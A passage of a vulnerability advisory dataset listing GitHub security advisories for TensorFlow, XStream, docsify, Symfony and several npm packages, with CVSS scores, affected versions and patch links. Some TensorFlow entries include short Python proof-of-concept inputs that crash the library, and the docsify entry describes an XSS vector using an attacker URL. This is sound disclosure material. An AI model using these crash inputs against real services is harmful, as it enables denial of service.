'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T14:21:01Z', 'nvd_published_at': None}" +1.4.0,GHSA-3w67-q784-6w7c,2021-05-18T16:59:44Z,2021-05-21T14:26:51Z,,['CVE-2021-29589'],Division by zero in TFLite's implementation of `GatherNd`,"### Impact +The reference implementation of the `GatherNd` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7/tensorflow/lite/kernels/internal/reference/reference_ops.h#L966): + +```cc +ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i); +``` + +An attacker can craft a model such that `params` input would be an empty tensor. In turn, `params_shape.Dims(.)` would be zero, in at least one dimension. + +### Patches +We have patched the issue in GitHub commit [8e45822aa0b9f5df4b4c64f221e64dc930a70a9d](https://github.com/tensorflow/tensorflow/commit/8e45822aa0b9f5df4b4c64f221e64dc930a70a9d). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3w67-q784-6w7c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29589'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8e45822aa0b9f5df4b4c64f221e64dc930a70a9d'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:59:44Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-q8j6-pwqx-pm96,2023-09-11T16:25:10Z,2021-05-17T20:58:02Z,,['CVE-2021-32819'],Insecure template handling in Squirrelly,Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. Version 9.0.0 has a fix for this issue. For complete details refer to the referenced [GHSL-2021-023](https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'squirrelly'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.0.8'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32819'}, {'type': 'WEB', 'url': 'https://github.com/squirrellyjs/squirrelly/pull/254'}, {'type': 'WEB', 'url': 'https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e'}, {'type': 'WEB', 'url': 'https://github.com/squirrellyjs/squirrelly/commit/dca7a1e7ee91d8a6ffffb655f3f15647486db9da'}, {'type': 'PACKAGE', 'url': 'https://github.com/squirrellyjs/squirrelly'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T18:46:59Z', 'nvd_published_at': '2021-05-14T19:15:00Z'}" +1.4.0,GHSA-g2qj-pmxm-9f8f,2021-10-08T21:21:12Z,2021-05-17T20:52:32Z,,[],User enumeration in authentication mechanisms,"Description +----------- + +The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user. + +Resolution +---------- + +We now ensure that 403s are returned whether the user exists or not if the password is invalid or if the user does not exist. + +The patch for this issue is available [here](https://github.com/symfony/symfony/commit/2a581d22cc621b33d5464ed65c4bc2057f72f011) for branch 3.4. + +Credits +------- + +I would like to thank James Isaac and Mathias Brodala for reporting the issue and Robin Chalas for fixing the issue.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.2.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.2.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-g2qj-pmxm-9f8f'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/2a581d22cc621b33d5464ed65c4bc2057f72f011'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T19:21:54Z', 'nvd_published_at': None}" +1.4.0,GHSA-qpqh-46qj-vwcw,2021-05-10T21:00:22Z,2021-05-18T01:53:18Z,,['CVE-2020-7680'],Cross-site Scripting in docsify,"docsify prior to 4.11.4 is susceptible to Cross-site Scripting (XSS). Docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. Due to lack of validation here, it is possible to provide external URLs after the /#/ (domain.com/#//attacker.com) and render arbitrary JavaScript/HTML inside docsify page.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'docsify'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.11.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7680'}, {'type': 'WEB', 'url': 'https://github.com/docsifyjs/docsify/issues/1126'}, {'type': 'WEB', 'url': 'https://github.com/docsifyjs/docsify/pull/1128'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/158515/Docsify.js-4.11.4-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/161495/docsify-4.11.6-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/Feb/71'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-10T21:00:22Z', 'nvd_published_at': '2020-07-20T16:15:00Z'}" +1.4.0,GHSA-gm8g-xhh8-rmwr,2021-04-19T22:22:45Z,2021-05-10T19:17:25Z,,['CVE-2020-7772'],Prototype Pollution in doc-path,This affects the package doc-path before 2.1.2.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'doc-path'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7772'}, {'type': 'WEB', 'url': 'https://github.com/mrodrig/doc-path/commit/3e2bb168cf303bffcd7fae5f8d05e5300c1541c7'}, {'type': 'WEB', 'url': 'https://github.com/mrodrig/doc-path/blob/stable/src/path.js%23L54'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOCPATH-1011952'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T22:22:45Z', 'nvd_published_at': '2020-11-15T15:15:00Z'}" +1.4.0,GHSA-xg68-chx2-253g,2021-05-20T21:58:11Z,2021-05-24T19:53:01Z,,['CVE-2021-20087'],Prototype Pollution in jquery-deparam,Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in jquery-deparam allows a malicious user to inject properties into Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-deparam'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20087'}, {'type': 'WEB', 'url': 'https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/jquery-deparam.md'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:58:11Z', 'nvd_published_at': '2021-04-23T18:15:00Z'}" +1.4.0,GHSA-pxcf-v868-m492,2023-09-11T20:22:40Z,2021-05-10T18:43:45Z,,['CVE-2020-7749'],Injection and Cross-site Scripting in osm-static-maps,"This affects all versions of package osm-static-maps under 3.9.0. User input given to the package is passed directly to a template without escaping `({{{ ... }}})`. As such, it is possible for an attacker to inject arbitrary HTML/JS code and depending on the context. It will be outputted as an HTML on the page which gives opportunity for XSS or rendered on the server (puppeteer) which also gives opportunity for SSRF and Local File Read.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'osm-static-maps'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7749'}, {'type': 'WEB', 'url': 'https://github.com/jperelli/osm-static-maps/pull/24'}, {'type': 'WEB', 'url': 'https://github.com/jperelli/osm-static-maps/commit/97355d29e08753d1cfe99b1281dbaa06f4e651b0'}, {'type': 'WEB', 'url': 'https://github.com/jperelli/osm-static-maps/blob/master/src/template.html%23L142'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-OSMSTATICMAPS-609637'}]","{'cwe_ids': ['CWE-74', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T18:16:30Z', 'nvd_published_at': '2020-10-20T11:15:00Z'}" +1.4.0,GHSA-73rg-x683-m3qw,2021-05-06T23:33:05Z,2021-05-07T16:05:16Z,,['CVE-2020-8215'],Buffer overflow in canvas,"A buffer overflow is present in canvas versions before 1.6.11, which could lead to a Denial of Service or execution of arbitrary code when it processes a user-provided image.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'canvas'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8215'}, {'type': 'WEB', 'url': 'https://github.com/Automattic/node-canvas/commit/c3e4ccb1c404da01e83fe5eb3626bf55f7f55957'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/315037'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/canvas'}]","{'cwe_ids': ['CWE-120'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T23:33:05Z', 'nvd_published_at': '2020-07-20T15:15:00Z'}" +1.4.0,GHSA-772p-x54p-hjrv,2021-05-18T23:32:11Z,2021-05-21T14:21:01Z,,['CVE-2021-29517'],Division by zero in `Conv3D`,"### Impact +A malicious user could trigger a division by 0 in `Conv3D` implementation: + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) +filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) + +tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/42033603003965bffac51ae171b51801565e002d/tensorflow/core/kernels/conv_ops_3d.cc#L143-L145) does a modulo operation based on user controlled input: + +```cc + const int64 out_depth = filter.dim_size(4); + OP_REQUIRES(context, in_depth % filter_depth == 0, ...); +``` + +Thus, when `filter` has a 0 as the fifth element, this results in a division by 0. + +Additionally, if the shape of the two tensors is not valid, an Eigen assertion can be triggered, resulting in a program crash: + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) +filter_tensor = tf.constant([], shape=[0, 0, 2, 6, 2], dtype=tf.float32) + +tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 39, 34, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) +``` + +The shape of the two tensors must follow the constraints specified in the [op description](https://www.tensorflow.org/api_docs/python/tf/raw_ops/Conv3D). + +### Patches +We have patched the issue in GitHub commit [799f835a3dfa00a4d852defa29b15841eea9d64f](https://github.com/tensorflow/tensorflow/commit/799f835a3dfa00a4d852defa29b15841eea9d64f). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-772p-x54p-hjrv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29517'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/799f835a3dfa00a4d852defa29b15841eea9d64f'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:32:11Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-24x6-8c7m-hv3f,2021-05-18T16:54:35Z,2021-05-21T14:26:53Z,,['CVE-2021-29590'],Heap OOB read in TFLite's implementation of `Minimum` or `Maximum`,"### Impact +The implementations of the `Minimum` and `Maximum` TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty. + +This is because [the broadcasting implementation](https://github.com/tensorflow/tensorflow/blob/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7/tensorflow/lite/kernels/internal/reference/maximum_minimum.h#L52-L56) indexes in both tensors with the same index but does not validate that the index is within bounds: + +```cc +auto maxmin_func = [&](int indexes[N]) { + output_data[SubscriptToIndex(output_desc, indexes)] = + op(input1_data[SubscriptToIndex(desc1, indexes)], + input2_data[SubscriptToIndex(desc2, indexes)]); +}; +``` + +### Patches +We have patched the issue in GitHub commit [953f28dca13c92839ba389c055587cfe6c723578](https://github.com/tensorflow/tensorflow/commit/953f28dca13c92839ba389c055587cfe6c723578). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-24x6-8c7m-hv3f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29590'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/953f28dca13c92839ba389c055587cfe6c723578'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:54:35Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-7chv-rrw6-w6fc,2022-02-08T21:30:18Z,2021-05-18T18:36:27Z,,['CVE-2021-29505'],XStream is vulnerable to a Remote Command Execution attack,"### Impact +The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.17. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-29505](https://x-stream.github.io/CVE-2021-29505.html). + +### Credits + +V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Email us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.17'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29505'}, {'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/commit/24fac82191292c6ae25f94508d28b9823f83624f'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8ee51debf7fd184b6a6b020dc31df25118b0aa612885f12fbe77f04f@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210708-0007/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-29505.html'}]","{'cwe_ids': ['CWE-502', 'CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:14:15Z', 'nvd_published_at': '2021-05-28T21:15:00Z'}" +1.4.0,GHSA-x4g7-fvjj-prg8,2021-05-18T23:10:37Z,2021-05-21T14:21:59Z,,['CVE-2021-29527'],Division by 0 in `QuantizedConv2D`,"### Impact +An attacker can trigger a division by 0 in `tf.raw_ops.QuantizedConv2D`: + +```python +import tensorflow as tf + +input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) +filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) +min_input = tf.constant(0.0) +max_input = tf.constant(0.0001) +min_filter = tf.constant(0.0) +max_filter = tf.constant(0.0001) +strides = [1, 1, 1, 1] +padding = ""SAME"" + + +tf.raw_ops.QuantizedConv2D(input=input, filter=filter, min_input=min_input, max_input=max_input, min_filter=min_filter, max_filter=max_filter, strides=strides, padding=padding) +``` +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/00e9a4d67d76703fa1aee33dac582acf317e0e81/tensorflow/core/kernels/quantized_conv_ops.cc#L257-L259) does a division by a quantity that is controlled by the caller: + +```cc +const int filter_value_count = filter_width * filter_height * input_depth; +const int64 patches_per_chunk = kMaxChunkSize / (filter_value_count * sizeof(T1)); +``` + +### Patches +We have patched the issue in GitHub commit [cfa91be9863a91d5105a3b4941096044ab32036b](https://github.com/tensorflow/tensorflow/commit/cfa91be9863a91d5105a3b4941096044ab32036b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x4g7-fvjj-prg8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29527'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/cfa91be9863a91d5105a3b4941096044ab32036b'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:10:37Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-27g8-r9vw-765x,2021-05-25T20:20:03Z,2021-05-27T18:39:03Z,,['CVE-2021-32624'],Private Field data leak,"This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control. + +This is an access control related oracle attack in that the attack method guides an attacker during their attempt to reveal information they do not have access to. The complexity of completing the attack is limited by some length-dependent behaviors and the fidelity of the exposed information. + +### Impact + +Under some circumstances, field values or field value meta data can be determined, despite the field or list having `read` access control configured. If you use private fields or lists, you may be impacted. + +### Patches + +None, at this time + +### Workarounds + +None, at this time + +### References + +None + +### For more information + +For the protection of the community and private deployments, we think that the best course of action will be to not disclose further details on any open GitHub issues related to this advisory until a hot-fix or work-around has been deployed or published. + +If needed, you can email us at keystone@thinkmill.com.au","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@keystonejs/keystone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': 